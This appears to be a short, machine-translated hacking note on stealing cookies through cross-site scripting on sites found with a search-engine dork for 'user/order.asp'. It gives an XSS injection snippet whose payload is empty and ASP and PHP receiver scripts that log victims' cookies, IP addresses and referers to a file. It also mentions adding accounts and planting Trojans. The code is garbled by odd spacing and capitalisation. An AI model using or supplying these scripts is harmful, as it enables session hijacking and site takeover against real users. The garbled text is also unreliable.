Google or baidu search inurl: user/order. asp? Type = VM
Currently, only XSS will steal cookies
You can add an account to mount Trojans in the background, etc.
XXS cookie Stealing code
<Script> document. write (' '); </script>
News. asp code:
<%
Msg = Request. ServerVariables ("QUERY_STRING ")
Testfile = Server. MapPath ("cook.txt ")
Set fs = server. CreateObject ("scripting. filesystemobject ")
Set thisfile = fs. OpenTextFile (testfile, 8, True, 0)
Thisfile. Writeline ("" & msg &"")
Thisfile. close
Set fs = nothing
%>
PHP code:
<? Php
$ Cookie = $ _ GET ['C'];
$ Ip = getenv ('remote _ ADDR ');
$ Time = date ("j F, Y, g: I ");
$ Referer = getenv ('HTTP _ referer ');
$ Fp = fopen('cook.txt ', 'A ');
Fwrite ($ fp, 'cookie :'. $ cookie. '<br> IP :'. $ ip. '<br> Date and Time :'. $ time. '<br> Referer :'. $ referer. '<br> ');
Fclose ($ fp );
?>
BY: CY
Fixed: strict Filtering